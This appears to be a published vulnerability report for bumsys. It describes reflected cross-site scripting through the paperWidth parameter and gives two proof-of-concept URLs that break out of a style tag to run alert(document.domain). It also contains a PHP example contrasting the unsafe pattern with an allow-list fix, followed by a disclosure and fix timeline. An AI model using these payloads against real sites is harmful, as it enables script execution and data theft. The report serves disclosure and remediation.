Improper Neutralization of Input in paperWidth param During Web Page Generation in unilogies/bumsys

Valid

Reported on Feb 22nd 2023


Module: print and invoice-print

Parameter: paperWidth

An attacker would be able to close the <style> tag and inject HTML tags.

POC: http://demo.bumsys.org/print?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E

POC: http://demo.bumsys.org/invoice-print/?&paperWidth=;}%3C/style%3E%3Cbody+onpageshow=alert(document.domain)%3E&msg=%3Ca%3E

Impact

It could lead to data theft through JavaScript execution.
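
One way to emit a request-supplied width into a <style> block safely, shown next to the unsafe pattern this report describes. This is an added example, not bumsys code and not the fix in commit 927214; it assumes a PHP handler, and the function names, the .print-area selector, the accepted units and the default width are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not bumsys code. Function names, the .print-area selector,
// the accepted units and the default width are assumptions for illustration.

const DEFAULT_PAPER_WIDTH = '100%';

// Unsafe pattern: the raw value lands inside <style>, so "</style>" in the
// input ends the CSS context and whatever follows is parsed as HTML.
function renderPrintStyleUnsafe(string $paperWidth): string
{
    return "<style>.print-area { width: {$paperWidth}; }</style>";
}

// Allow-list: accept only a plain CSS length, otherwise use the default.
// htmlspecialchars() alone is not enough here: <style> content is raw text,
// so entities are not decoded and ";" or "}" would still let CSS be injected.
function safePaperWidth(?string $raw): string
{
    $value = trim((string) $raw);
    // \A and \z anchor the match to the whole string.
    $pattern = '/\A\d{1,4}(?:\.\d{1,2})?(?:px|mm|cm|in|pt|%)\z/';
    return preg_match($pattern, $value) === 1 ? $value : DEFAULT_PAPER_WIDTH;
}

function renderPrintStyle(?string $paperWidth): string
{
    $width = safePaperWidth($paperWidth);
    return "<style>.print-area { width: {$width}; }</style>";
}

// Constructed inputs: a legitimate width, the payload shape from the PoC,
// and a missing parameter.
$samples = ['80mm', ';}</style><body onpageshow=alert(document.domain)>', null];

foreach ($samples as $sample) {
    echo 'input : ', var_export($sample, true), PHP_EOL;
    if ($sample !== null) {
        echo 'unsafe: ', renderPrintStyleUnsafe($sample), PHP_EOL;
    }
    echo 'safe  : ', renderPrintStyle($sample), PHP_EOL, PHP_EOL;
}
```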

We are processing your report and will contact the unilogies/bumsys team within 24 hours. (a year ago)
A GitHub Issue asking the maintainers to create a SECURITY.md exists (a year ago)
Khurshid Alam validated this vulnerability (a year ago)
mukundbhuva has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.1 with commit 927214 (a year ago)
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published (a year ago)